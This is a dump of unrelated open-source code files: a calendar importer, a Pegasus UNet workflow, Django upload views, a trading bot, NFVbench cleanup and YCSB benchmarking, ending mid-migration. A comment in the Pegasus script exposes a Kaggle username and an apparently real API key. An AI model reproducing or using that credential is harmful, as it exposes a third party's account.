retrieves feed data from master JSON file\n\t\tINPUT: None\n\t\tOUTPUT:\tcalendars -- imported calendar data\n\t'''\n\t# Read in data from master CSV file\n\tdir = os.path.dirname(os.path.realpath(__file__))\n\tfeed_file = '/'.join(dir.split('/')[0:-2]) + \"/opt/feeds.json\"\n\tff = open(feed_file, 'r')\n\tcalendars = json.load(ff)\n\tff.close()\n\treturn calendars\n\t\n\t\ndef write_feed_data(calendars):\n\tdir = os.path.dirname(os.path.realpath(__file__))\n\tfeed_file = '/'.join(dir.split('/')[0:-2]) + \"/opt/feeds_new.json\"\n\tff = open(feed_file, 'w')\n\tjson.dump(calendars, ff)\n\tff.close()\n\tsubprocess.check_output(\"mv ../opt/feeds_new.json ../opt/feeds.json\", shell=True)\n\t\n\ndef get_cal_data(force=False):\n\t# Determine whether calendar JSON file exists\n\tcal_json = '/'.join(os.path.dirname(os.path.realpath(__file__)).split('/')[0:-2]) + '/data/calendar.json'\n\tif os.path.isfile(cal_json):\n\t\tfile_age = time.time() - os.stat(cal_json)[stat.ST_MTIME]\n\t\tif file_age < 86400: regen = False\n\t\telse: regen = True\n\telse: regen = True\n\t\n\t# Regenerate calendar JSON file\n\tif regen or force:\n\t\tfeed_data = get_feed_data()\n\t\tevents = []\n\t\tfor f in range(len(feed_data)):\n\t\t\tif feed_data[f]['url'].find('.ics') >= 0: events = parse_ics(feed_data[f], events)\n\t\t\telse: events = parse_xml(feed_data[f], events)\n\t\t# Convert objects to dicts which can be JSON-ified\n\t\toutput_dicts = []\n\t\tfor e in events:\n\t\t\tedict = {}\n\t\t\tfor a in dir(e):\n\t\t\t\tif a.startswith('__') or callable(getattr(e,a)): continue\n\t\t\t\tedict[a] = getattr(e,a)\n\t\t\toutput_dicts.append(edict)\n\t\t# Write data to new JSON file\n\t\tof = open(cal_json, 'w')\n\t\tjson.dump(output_dicts, of)\n\t\tof.close()\n\t\t\n\t# Read everything in from JSON file\n\tdf = open(cal_json, 'r')\n\tdata = json.load(df)\n\tdf.close()\n\t\t\n\t# Read JSON data into objects\n\tevents = []\n\tfor d in data:\n\t\te = calevent()\n\t\tfor k,v in d.iteritems():\n\t\t\tsetattr(e, k, v)\n\t\tevents.append(e)\n\t\t\n\treturn events\n\n\ndef get_db_events(db):\n\t'''\n\t\tDESCRIPTION: Gets all currently-stored events in the database and returns them in the same object format as newly-input events\n\t\tINPUT: db -- database connection object created in webapp\n\t\tOUTPUT: eventList -- list of event objects for all events in database\n\t'''\n\t# Get table information\n\tsession = db.Session()\n\tsession.commit()\n\tmetadata = db.metadata\n\teventTable = Table('events', metadata, autoload=True)\n\n\t# Save all data to event list\n\teventList = []\n\tfor e in session.execute(\"SELECT * from caldata.events\").fetchall():\n\t\teventList.append(calevent())\n\t\teventList[-1].title, eventList[-1].description, eventList[-1].image, eventList[-1].organization = e[2], e[3].split('||'), e[4], e[5]\n\t\teventList[-1].displayStart, eventList[-1].displayEnd, eventList[-1].sortKey = e[6], e[7], e[8] \n\t\teventList[-1].latitude, eventList[-1].longitude, eventList[-1].displayLocation = e[9], e[10], e[11]\n\t\teventList[-1].categoryPrimary, eventList[-1].categorySecondary = e[12], e[13]\n\t\teventList[-1].contactEmail, eventList[-1].contactPhone = e[14], e[15]\n\t\teventList[-1].publicStatus, eventList[-1].capacity, eventList[-1].agerange = e[16], e[17], e[18]\n\t\teventList[-1].ticketstatus, eventList[-1].ticketinfo, eventList[-1].ticketlink, eventList[-1].ticketprice = e[19], e[20], e[21], e[22]\n\t\teventList[-1].hash = e[23]\n\treturn eventList\n\n\ndef add_db_event(db, eventList):\n\t'''\n\t\tDESCRIPTION: Adds event objects to database\n\t\tINPUT: db -- database connection object from webapp\n\t\t eventList -- list of calendar event objects to be added\n\t\tOUTPUT: None\n\t'''\n\tmetadata = db.metadata\n\teventTable = Table('events', metadata, autoload=True)\n\tfor eventObject in eventList:\n\t\ti = eventTable.insert()\n\t\ti.execute( title=eventObject.title, \n\t\t\t\t description='||'.join(eventObject.description),\n\t\t\t\t image=eventObject.image,\n\t\t\t\t organization=eventObject.organization,\n\t\t\t\t start=eventObject.displayStart,\n\t\t\t\t end=eventObject.displayEnd,\n\t\t\t\t sortkey=eventObject.sortKey,\n\t\t\t\t latitude=eventObject.latitude,\n\t\t\t\t longitude=eventObject.longitude,\n\t\t\t\t displaylocation=eventObject.displayLocation,\n\t\t\t\t categoryprimary=eventObject.categoryPrimary,\n\t\t\t\t categorysecondary=eventObject.categorySecondary,\n\t\t\t\t contactemail=eventObject.contactEmail,\n\t\t\t\t contactphone=eventObject.contactPhone,\n\t\t\t\t publicstatus=eventObject.publicStatus,\n\t\t\t\t capacity=eventObject.capacity,\n\t\t\t\t agerange=eventObject.ageRange,\n\t\t\t\t ticketstatus=eventObject.ticketStatus,\n\t\t\t\t ticketinfo=eventObject.ticketInfo,\n\t\t\t\t ticketlink=eventObject.ticketLink,\n\t\t\t\t ticketprice=eventObject.ticketPrice,\n\t\t\t\t hash=str(eventObject.hash)\n\t\t \t )\n\ndef delete_db_event(db, hash_to_delete):\n\tsession = db.Session()\n\tmetadata = db.metadata\n\teventTable = Table('events', metadata, autoload=True)\n\n\td = delete(eventTable, eventTable.c.hash == hash_to_delete)\n\tsession.execute(d)\n\tsession.commit()\n\n\n\t\n\n\n\n","sub_path":"python/calImport/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":5078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"344041972","text":"#!/usr/bin/env python\nimport logging\nfrom pathlib import Path\nfrom Pegasus.api import *\nimport glob\nimport os\nimport pandas as pd\nlogging.basicConfig(level = logging.DEBUG)\n\n#Properties\nprops = Properties()\nprops[\"dagman.retry\"] = \"100\"\nprops[\"pegasus.transfer.arguments\"] = \"-m 1\"\nprops.write()\n\n\n# import os\n# os.environ['KAGGLE_USERNAME'] = \"vedula\"\n# os.environ['KAGGLE_KEY'] = \"482a5c14ced45f63f3698eacb8fa0c62\"\n\n# import kaggle\n# kaggle.api.dataset_download_files('nikhilpandey360/chest-xray-masks-and-labels/download', path='.', unzip=True)\n\ntc = TransformationCatalog()\n\nunet_wf = Container(\n \"unet_wf\",\n Container.DOCKER,\n image=str(Path(\".\").resolve()/\"unet_cont.tar\"),\n image_site=\"local\"\n )\n\n\npreprocess = Transformation(\n \"preprocess\",\n site=\"condorpool\",\n pfn=\"/usr/bin/preprocess.py\",\n is_stageable=False,\n container=unet_wf\n )\n\n# preprocess.add_condor_profile(requirements = 'HAS_SINGULARITY == True')\n# preprocess.add_profiles(Namespace.CONDOR, key=\"+SingularityImage\", value='\"/cvmfs/singularity.opensciencegrid.org/vedularaghu/unet_wf:latest\"')\n\n\ndata_split = Transformation(\n \"data_split\",\n site=\"condorpool\",\n pfn=\"/usr/bin/data_split.py\",\n is_stageable=False,\n container=unet_wf\n )\n\n# data_split.add_condor_profile(requirements = 'HAS_SINGULARITY == True')\n# data_split.add_profiles(Namespace.CONDOR, key=\"+SingularityImage\", value='\"/cvmfs/singularity.opensciencegrid.org/vedularaghu/unet_wf:latest\"')\n\ntrain_model = Transformation( \n \"train_model\",\n site=\"condorpool\",\n pfn=\"/usr/bin/train_model.py\",\n is_stageable=False,\n container=unet_wf\n )\n\n# train_model.add_condor_profile(requirements = 'HAS_SINGULARITY == True')\n# train_model.add_profiles(Namespace.CONDOR, key=\"+SingularityImage\", value='\"/cvmfs/singularity.opensciencegrid.org/vedularaghu/unet_wf:latest\"')\n\n\ntc.add_containers(unet_wf)\ntc.add_transformations(preprocess, data_split, train_model)\ntc.write()\n\nfile_list = []\noutput_list = []\n\nrc = ReplicaCatalog()\n\nfor file in glob.glob(\"./train_images/*.png\"):\n f = file.replace(\"./train_images/\", '')\n file_list.append(File(f))\n rc.add_replica(\"local\", File(f), Path(\"./train_images/\").resolve() / f)\n \nfor file in glob.glob(\"./train_masks/*.png\"):\n f = file.replace(\"./train_masks/\", '')\n file_list.append(File(f))\n rc.add_replica(\"local\", File(f), Path(\"./train_masks/\").resolve() / f)\n \nfor file in glob.glob(\"./test/*.png\"):\n f = file.replace(\"./test/\", '')\n file_list.append(File(f))\n rc.add_replica(\"local\", File(f), Path(\"./test/\").resolve() / f)\n \n\n \ncheckpoint_file = \"study_checkpoint.pkl\"\nif not os.path.isfile(checkpoint_file):\n df = pd.DataFrame(list())\n df.to_pickle(checkpoint_file)\n\nrc.add_replica(\"local\", checkpoint_file, Path(\".\").resolve() / checkpoint_file)\n \nrc.write()\n\nfor filename in glob.glob(\"./train_images/*.png\"):\n f = filename.replace(\"./train_images/\", '').strip(\".png\")+\"_norm.png\"\n output_list.append(File(f))\n\n\nfor filename in glob.glob(\"./train_masks/*.png\"):\n f = filename.replace(\"./train_masks/\", '').strip(\".png\")+\"_norm.png\"\n output_list.append(File(f))\n\nfor filename in glob.glob(\"./test/*.png\"):\n f = filename.replace(\"./test/\", '').strip(\".png\")+\"_norm.png\"\n output_list.append(File(f))\n\n \nwf = Workflow(\"preprocess\")\n \njob_preprocess = Job(preprocess).add_inputs(*file_list).add_outputs(*output_list)\\\n\ndata_split_file = File(\"data_split.pkl\")\n\njob_data_split = Job(data_split).add_inputs(*output_list).add_outputs(data_split_file)\n\nmodel = File(\"model.h5\")\n\n\njob_train = Job(train_model)\\\n .add_checkpoint(File(checkpoint_file), stage_out=True)\\\n .add_inputs(*output_list, data_split_file)\\\n .add_outputs(model)\n\n\nwf.add_jobs(job_preprocess, job_data_split, job_train)\n\ntry:\n wf.plan(submit=True)\\\n .wait().analyze()\\\n .statistics()\nexcept PegasusClientError as e:\n print(e.output) \n\n\n\n\n\n","sub_path":"shared-data/UNet_wf/wf-docker.py","file_name":"wf-docker.py","file_ext":"py","file_size_in_byte":4224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"126054791","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.views.decorators.http import require_http_methods\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.template import loader \nfrom django.shortcuts import render\n\nfrom . import handler\n\ncontext = [{'template', ''}]\n# Create your views here.\n\n# test\ndef index(request):\n\treturn HttpResponse('你好')\n\n\n# 文件上传\n@csrf_exempt\n@require_http_methods(['POST'])\ndef upload(request):\n\tfile_obj = request.FILES.get('csv_file')\n\tif file_obj:\n\t\tfor chunk in file_obj.chunks():\n\t\t\tif len(chunk) > 100 * 1024 * 1024:\n\t\t\t\treturn HttpResponse('文件过大(100M)')\n\n\t\t\tsuffic = file_obj.name.split('.')[-1]\n\t\t\ttable_name = file_obj.name.split('.')[0]\n\t\t\tif len(suffic) != 0 and suffic == 'xlsx':\n\t\t\t\tif not handler.handle_table(chunk, table_name, 1, 1):\n\t\t\t\t\treturn HttpResponse(\"文件解析出错\")\n\t\t\telif len(suffic) != 0 and suffic == 'png':\n\t\t\t\tif not handler.handle_table(chunk, table_name, 1, 2):\n\t\t\t\t\treturn HttpResponse(\"文件解析出错\")\n\t\t\telse:\n\t\t\t\treturn HttpResponse(\"文件格式异常\")\n\n\t\treturn HttpResponse('上传成功')\n\n\n# 获取所有报表\ndef get_table(request):\n\tret = handler.get_all_table()\n\treturn HttpResponse(ret)\n\n\n# 查看表格\n@require_http_methods(['GET'])\ndef observe(request):\n\tcontext = handler.get_one_table(request.GET.get(\"t\"))\n\ttemplate = loader.get_template('table.html')\n\thtml_str = template.render(context, request)\n\treturn HttpResponse(html_str);\n\n\n# 删除表格\n@require_http_methods(['GET'])\ndef remove(request):\n\thandler.delete_table(request.GET.get(\"t\"));\n\treturn HttpResponse(open('static/basic-table.html', 'rb'), content_type='text/html');\n","sub_path":"db_system/ui/system/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"102693914","text":"\"\"\"\nExchain\n\"\"\"\n\nfrom storage import (\n read_config,\n connect_database, close_database,\n select_tickers, update_ticker,\n select_assets,\n select_previous_trade, insert_trade, select_unexecuted_trades, update_trade\n)\nfrom api import fetch_prices, notify_trades, bitflyer_trade\nfrom indicator import calculate_macd_histograms\nfrom analysis import analyze_macd\nfrom strategy import identify_overall_side, check_reversal\n\nTRADE_TYPE = 'market'\n\ndef main():\n \"\"\"\n Main\n \"\"\"\n connect_database(read_config('storage.database.mysql'))\n sides = []\n points = {}\n for ticker in select_tickers():\n prices = fetch_prices(\n ticker['exchange'],\n ticker['pair'],\n read_config('api.data_fetcher.interval'),\n read_config('api.data_fetcher.period')\n )\n if len(prices) == 0:\n continue\n side = analyze_macd(\n calculate_macd_histograms(prices)[-read_config('analysis.macd.period'):],\n read_config('analysis.macd.monotonic_period')\n )\n update_ticker(ticker['id'], side, prices[-1]['close'])\n if ticker['priority'] > 0:\n sides.append(side)\n points[ticker['id']] = {\n 'last_price': prices[-1]['close']\n }\n overall_side = identify_overall_side(sides, read_config('strategy.rule.consensus_threshold'))\n if overall_side is not None and overall_side != 'hold':\n trades = []\n for asset in [a for a in select_assets()]:\n previous_trade = select_previous_trade(a['id'])\n if check_reversal(previous_trade, overall_side):\n price = points[asset['ticker_id']]['last_price']\n insert_trade(asset['id'], overall_side, price, asset['amount'], TRADE_TYPE)\n trades.append({\n 'api': asset['api'],\n 'exchange': asset['exchange'],\n 'symbol': asset['symbol'],\n 'price': price\n })\n notify_trades(trades, overall_side)\n execute_trades(select_unexecuted_trades())\n close_database()\n\ndef execute_trades(trades):\n \"\"\"\n Execute trades\n \"\"\"\n for trade in trades:\n if trade['exchange'] == 'bitflyer':\n is_executed = bitflyer_trade({\n 'key': trade['api']['bitflyer_api_key'],\n 'secret': trade['api']['bitflyer_api_secret']\n }, trade['symbol'], trade['type'], trade['side'], trade['amount'])\n if is_executed:\n update_trade(trade['id'])\n else:\n update_trade(trade['id'])\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"exchain/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"27076878","text":"import metapy\n\nidx = metapy.index.make_inverted_index('temp.toml')\nranker = metapy.index.OkapiBM25(k1=1.2,b=0.75,k3=500.0)\nquery = metapy.index.Document()\nev = metapy.index.IREval('temp.toml')\n\nnum_results = 10\nwith open('data/apnews-queries.txt') as query_file:\n for query_num, line in enumerate(query_file):\n query.content(line.strip())\n results = ranker.score(idx, query, num_results)\n avg_p = ev.avg_p(results, query_num, num_results)\n print(\"Query {} average precision: {}\".format(query_num + 1, avg_p))\nprint(ev.map())\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"170383659","text":"#!/usr/bin/env python\n# Copyright 2017 Cisco Systems, Inc. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n\nimport sys\nimport time\n\nfrom neutronclient.neutron import client as nclient\nfrom novaclient.client import Client\nfrom novaclient.exceptions import NotFound\nfrom tabulate import tabulate\n\nimport credentials as credentials\nfrom log import LOG\n\nclass ComputeCleaner(object):\n \"\"\"A cleaner for compute resources.\"\"\"\n\n def __init__(self, nova_client, instance_prefix):\n self.nova_client = nova_client\n LOG.info('Discovering instances %s...', instance_prefix)\n all_servers = self.nova_client.servers.list()\n self.servers = [server for server in all_servers\n if server.name.startswith(instance_prefix)]\n\n def instance_exists(self, server):\n try:\n self.nova_client.servers.get(server.id)\n except NotFound:\n return False\n return True\n\n def get_resource_list(self):\n return [[\"Instance\", server.name, server.id] for server in self.servers]\n\n def clean(self):\n if self.servers:\n for server in self.servers:\n try:\n LOG.info('Deleting instance %s...', server.name)\n self.nova_client.servers.delete(server.id)\n except Exception:\n LOG.exception(\"Instance %s deletion failed\", server.name)\n LOG.info(' Waiting for %d instances to be fully deleted...', len(self.servers))\n retry_count = 15 + len(self.servers) * 5\n while True:\n retry_count -= 1\n self.servers = [server for server in self.servers if self.instance_exists(server)]\n if not self.servers:\n break\n\n if retry_count:\n LOG.info(' %d yet to be deleted by Nova, retries left=%d...',\n len(self.servers), retry_count)\n time.sleep(2)\n else:\n LOG.warning(' instance deletion verification time-out: %d still not deleted',\n len(self.servers))\n break\n\n\nclass NetworkCleaner(object):\n \"\"\"A cleaner for network resources.\"\"\"\n\n def __init__(self, neutron_client, network_name_prefixes):\n self.neutron_client = neutron_client\n LOG.info('Discovering networks...')\n all_networks = self.neutron_client.list_networks()['networks']\n self.networks = []\n net_ids = []\n for net in all_networks:\n netname = net['name']\n for prefix in network_name_prefixes:\n if netname.startswith(prefix):\n self.networks.append(net)\n net_ids.append(net['id'])\n break\n if net_ids:\n LOG.info('Discovering ports...')\n all_ports = self.neutron_client.list_ports()['ports']\n self.ports = [port for port in all_ports if port['network_id'] in net_ids]\n else:\n self.ports = []\n\n def get_resource_list(self):\n res_list = [[\"Network\", net['name'], net['id']] for net in self.networks]\n res_list.extend([[\"Port\", port['name'], port['id']] for port in self.ports])\n return res_list\n\n def clean(self):\n for port in self.ports:\n LOG.info(\"Deleting port %s...\", port['id'])\n try:\n self.neutron_client.delete_port(port['id'])\n except Exception:\n LOG.exception(\"Port deletion failed\")\n\n for net in self.networks:\n LOG.info(\"Deleting network %s...\", net['name'])\n try:\n self.neutron_client.delete_network(net['id'])\n except Exception:\n LOG.exception(\"Network deletion failed\")\n\nclass FlavorCleaner(object):\n \"\"\"Cleaner for NFVbench flavor.\"\"\"\n\n def __init__(self, nova_client, name):\n self.name = name\n LOG.info('Discovering flavor %s...', name)\n try:\n self.flavor = nova_client.flavors.find(name=name)\n except NotFound:\n self.flavor = None\n\n def get_resource_list(self):\n if self.flavor:\n return [['Flavor', self.name, self.flavor.id]]\n return None\n\n def clean(self):\n if self.flavor:\n LOG.info(\"Deleting flavor %s...\", self.flavor.name)\n try:\n self.flavor.delete()\n except Exception:\n LOG.exception(\"Flavor deletion failed\")\n\nclass Cleaner(object):\n \"\"\"Cleaner for all NFVbench resources.\"\"\"\n\n def __init__(self, config):\n cred = credentials.Credentials(config.openrc_file, None, False)\n session = cred.get_session()\n self.neutron_client = nclient.Client('2.0', session=session)\n self.nova_client = Client(2, session=session)\n network_names = [inet['name'] for inet in config.internal_networks.values()]\n self.cleaners = [ComputeCleaner(self.nova_client, config.loop_vm_name),\n FlavorCleaner(self.nova_client, config.flavor_type),\n NetworkCleaner(self.neutron_client, network_names)]\n\n def show_resources(self):\n \"\"\"Show all NFVbench resources.\"\"\"\n table = [[\"Type\", \"Name\", \"UUID\"]]\n for cleaner in self.cleaners:\n res_list = cleaner.get_resource_list()\n if res_list:\n table.extend(res_list)\n count = len(table) - 1\n if count:\n LOG.info('Discovered %d NFVbench resources:\\n%s', count,\n tabulate(table, headers=\"firstrow\", tablefmt=\"psql\"))\n else:\n LOG.info('No matching NFVbench resources found')\n return count\n\n def clean(self, prompt):\n \"\"\"Clean all resources.\"\"\"\n LOG.info(\"NFVbench will delete all resources shown...\")\n if prompt:\n answer = raw_input(\"Are you sure? (y/n) \")\n if answer.lower() != 'y':\n LOG.info(\"Exiting without deleting any resource\")\n sys.exit(0)\n for cleaner in self.cleaners:\n cleaner.clean()\n","sub_path":"nfvbench/cleanup.py","file_name":"cleanup.py","file_ext":"py","file_size_in_byte":6700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"255497795","text":"import subprocess;\nimport math\n\nfrom util.ycsbCommands.Commands import getLoadCommand;\nfrom util.ycsbCommands.Commands import getRunCommand;\nfrom util.util import checkExitCodeOfProcess;\n\nclass Cluster(object):\n \n def __init__(self, normalBinding, consistencyBinding, nodesInCluster):\n self.__normalbinding = normalBinding;\n self.__consistencyBinding = consistencyBinding;\n self.__nodesInCluster = nodesInCluster;\n \n def getNormalBinding(self):\n return self.__normalbinding;\n \n def getConsistencyBinding(self):\n return self.__consistencyBinding;\n \n def getNodesInCluster(self):\n return list(self.__nodesInCluster);\n \n # Should be overriden in subclasses\n def deleteDataInCluster(self):\n pass;\n \n def writeNormalWorkloadFile(self, remoteYcsbNodes, pathForWorkloadFile):\n dataToWrite = 'recordcount=100000\\n' + \\\n 'operationcount=100000000\\n' + \\\n \"\"\"workload=com.yahoo.ycsb.workloads.CoreWorkload\n \nreadallfields=true\n \nreadproportion=0.4\nupdateproportion=0.25\nscanproportion=0.1\ninsertproportion=0.25\n\nscanlengthdistribution=uniform\nmaxscanlength=100\n \nrequestdistribution=zipfian\n\nhosts=\"\"\" + \",\".join(self.getNodesInCluster());\n self.writeFileToYcsbNodes(dataToWrite, remoteYcsbNodes, pathForWorkloadFile, pathForWorkloadFile);\n\n def writeConsistencyWorkloadFile(self, remoteYcsbNodes, pathForWorkloadFile):\n dataToWrite = \"\"\"recordcount=100000\noperationcount=100000000\nworkload=com.yahoo.ycsb.workloads.CoreWorkload\n\nreadallfields=true\n\nreadproportion=0.4\nupdateproportion=0.25\nscanproportion=0.1\ninsertproportion=0.25\n\nscanlengthdistribution=uniform\nmaxscanlength=100\n\nrequestdistribution=zipfian\n\nstarttime=10000\n\nconsistencyTest=True\n\nuseFixedOperationDistributionSeed=True\noperationDistributionSeed=46732463246\n\nreadProportionConsistencyCheck=0.5\nupdateProportionConsistencyCheck=0.5\n\nhosts=\"\"\" + \",\".join(self.getNodesInCluster());\n self.writeFileToYcsbNodes(dataToWrite, remoteYcsbNodes, pathForWorkloadFile, pathForWorkloadFile);\n\n def writeFileToYcsbNodes(self, dataToWrite, remoteYcsbNodes, localPath, remotePath):\n f = open(localPath, \"w\");\n f.write(dataToWrite);\n f.close();\n for ip in remoteYcsbNodes:\n exitCode = subprocess.call(['scp', localPath, 'root@' + ip + ':' + remotePath]);\n checkExitCodeOfProcess(exitCode, 'Writing workload file to remote YCSB nodes failed');\n\n def getLoadCommand(self, pathToWorkloadFile, extraParameters = []):\n return getLoadCommand(self.getNormalBinding(), pathToWorkloadFile, extraParameters);\n\n def getRunCommand(self, pathToWorkloadFile, runtimeBenchmarkInMinutes, amountOfThreads, extraParameters = []):\n return getRunCommand(self.getNormalBinding(), pathToWorkloadFile, runtimeBenchmarkInMinutes, amountOfThreads, extraParameters);\n\n def getConsistencyRunCommand(self, pathToWorkloadFile, pathConsistencyResult, runtimeBenchmarkInMinutes,\n workloadThreads, outputFile, requestPeriod, seedForOperationSelection,\n accuracyInMicros, maxDelayBeforeDrop, stopOnFirstConsistency, cluster,\n targetThroughput, pathRawInsertData, pathRawUpdateData, delayToWriterThreadInMicros, extraParameters = []):\n extraParameters = self.addDbSpecificConsistencyBenchmarkParams(extraParameters)\n extraParameters.extend(['-p', 'insertMatrixDelayExportFile=' + outputFile + '_insertDelay'])\n extraParameters.extend(['-p', 'updateMatrixDelayExportFile=' + outputFile + '_updateDelay'])\n extraParameters.extend(['-p', 'insertMatrixNbOfChangesExportFile=' + outputFile + '_insertNbOfChanges'])\n extraParameters.extend(['-p', 'updateMatrixNbOfChangesExportFile=' + outputFile + '_updateNbOfChanges'])\n extraParameters.extend(['-p', 'insertMatrixRawExportFile=' + pathRawInsertData])\n extraParameters.extend(['-p', 'updateMatrixRawExportFile=' + pathRawUpdateData])\n extraParameters.extend(['-p', 'newrequestperiodMillis=' + str(requestPeriod)])\n extraParameters.extend(['-p', 'timeoutConsistencyBeforeDropInMicros=100000000']) # neglect field\n extraParameters.extend([\"-p\", \"useFixedOperationDistributionSeed=True\"])\n extraParameters.extend([\"-p\", \"operationDistributionSeed=\" + seedForOperationSelection])\n extraParameters.extend([\"-p\", \"accuracyInMicros=\" + str(accuracyInMicros)])\n extraParameters.extend([\"-p\", \"delayToWriterThread=\" + str(delayToWriterThreadInMicros)])\n if(maxDelayBeforeDrop > 0):\n extraParameters.extend(['-p', 'maxDelayConsistencyBeforeDropInMicros=' + str(maxDelayBeforeDrop)])\n extraParameters.extend(['-p', 'stopOnFirstConsistency=' + str(stopOnFirstConsistency)])\n # The first IP is the default of the database library\n # The second IP will be used for for write data is the consistency tests\n # This makes the database library use a different node for write and read operations\n extraParameters.extend(['-p', 'writenode=' + cluster.getNodesInCluster()[1]])\n if targetThroughput is not None:\n targetThroughputLoadThreads = self._getTargetThroughputLoadThreads(requestPeriod, targetThroughput)\n if targetThroughputLoadThreads > 0:\n extraParameters.extend(['-p', 'addSeparateWorkload=True'])\n extraParameters.extend(['-threads', str(workloadThreads)])\n extraParameters.extend(['-target', str(targetThroughputLoadThreads)])\n else:\n extraParameters.extend(['-p', 'addSeparateWorkload=False'])\n extraParameters.extend(['-threads', \"1\"])\n extraParameters.extend(['-p', 'resultfile=' + pathConsistencyResult])\n return getRunCommand(self.getConsistencyBinding(), pathToWorkloadFile, runtimeBenchmarkInMinutes,\n str(workloadThreads), extraParameters)\n\n def addDbSpecificConsistencyBenchmarkParams(self, paramList):\n return paramList\n\n def _getTargetThroughputLoadThreads(self, requestPeriodInMillis, targetThroughput):\n throughputNonLoadThreads = self._getThroughputProducedByNonLoadThreads(requestPeriodInMillis)\n return max(targetThroughput - throughputNonLoadThreads, 0)\n\n def _getThroughputProducedByNonLoadThreads(self, requestPeriodInMillis):\n requestPeriodsPerSecond = (1000/requestPeriodInMillis)\n return math.floor(2*requestPeriodsPerSecond) # 1 write thread + 1 read thread\n\n def removeNode(self, ipNodeToRemove):\n result = self.doRemoveNode(ipNodeToRemove);\n self.__nodesInCluster.remove(ipNodeToRemove);\n return result;\n\n def addNode(self, ipNodeToAdd):\n self.doAddNode(ipNodeToAdd);\n self.__nodesInCluster.append(ipNodeToAdd);\n \n # Should be overriden in subclasses\n def stopNode(self, ipNodeToStop):\n pass;\n\n # Should be overriden in subclasses\n def startNode(self, ipNodeToStart):\n pass;\n \n def getOtherIpInCluster(self, ip):\n for otherIp in self.__nodesInCluster:\n if otherIp != ip:\n return otherIp;\n raise Exception('No other ip found in cluster')\n","sub_path":"front_end/cluster/Cluster.py","file_name":"Cluster.py","file_ext":"py","file_size_in_byte":7296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"430108276","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('items', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='InventoryItem',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('quantity', models.IntegerField(default=1)),\n ('equipped', models.BooleanField(default=False)),\n ('acquire_date', models.DateTimeField(auto_now_add=True)),\n ('item', models.ForeignKey(to='items.Item')),\n ],\n ),\n migrations.CreateModel(\n name='Profile',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('username', models.CharField(help_text='Required. 55 characters or fewer. Letters, digits, -, _, and spaces only.', unique=True, max_length=55, verbose_name='username', validators=[django.core.validators.RegexValidator(b'^[\\\\w\\\\s_ -]+$', 'Enter a valid username.', b'invalid')])),\n ('gold', models.IntegerField(default=0)),\n ('ooc_description', models.TextField(blank=True)),\n ('ooc_dob', models.DateField(null=True, blank=True)),\n ('ooc_gender', models.CharField(max_length=11, choices=[(b'Male', b'Male'), (b'Female', b'Female'), (b'Unspecified', b'Unspecified')])),\n ('ooc_country', models.CharField(max_length=255, null=True, blank=True)),\n ('created', models.DateTimeField(auto_now_add=True)),\n ('last_online', models.DateTimeField(auto_now=True)),\n ('ooc_word_count', models.IntegerField(default=0)),\n ('hidden', models.BooleanField(default=False)),\n ('avatar', models.ImageField(null=True, upload_to=b'media/uploads/%Y/%m/%d', blank=True)),\n ('notify_replies', models.BooleanField(default=True)),\n ('notify_pm', models.BooleanField(default=True)),\n ('pop_up_pm', models.BooleanField(default=False)),\n ('disable_system_messages', models.BooleanField(default=False)),\n ('disable_signature_images', models.BooleanField(default=False)),\n ('hide_donations', models.BooleanField(default=False)),\n ('description', models.TextField(blank=True)),\n ('signature', models.TextField(blank=True)),\n ('character_name', models.CharField(max_length=150)),\n ('character_age', models.CharField(max_length=25)),\n ('character_race', models.CharField(max_length=150)),\n ('character_gender', models.CharField(default=b'Unspecified', max_length=10, choices=[(b'Male', b'Male'), (b'Female', b'Female'), (b'Unspecified', b'Unspecified')])),\n ('alignment', models.CharField(max_length=2, choices=[(b'LG', b'Lawful Good'), (b'TG', b'True Good'), (b'CG', b'Chaotic Good'), (b'LN', b'Lawful Neutral'), (b'TN', b'True Neutral'), (b'CN', b'Chaotic Neutral'), (b'LE', b'Lawful Evil'), (b'TE', b'True Evil'), (b'CE', b'Chaotic Evil')])),\n ('class_desc', models.CharField(max_length=150)),\n ('word_count', models.IntegerField(default=0)),\n ('longest_post', models.IntegerField(default=0)),\n ('views', models.IntegerField(default=0)),\n ('updated', models.DateTimeField(auto_now=True)),\n ('items', models.ManyToManyField(to='account.InventoryItem', blank=True)),\n ('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'ordering': ['created'],\n },\n ),\n 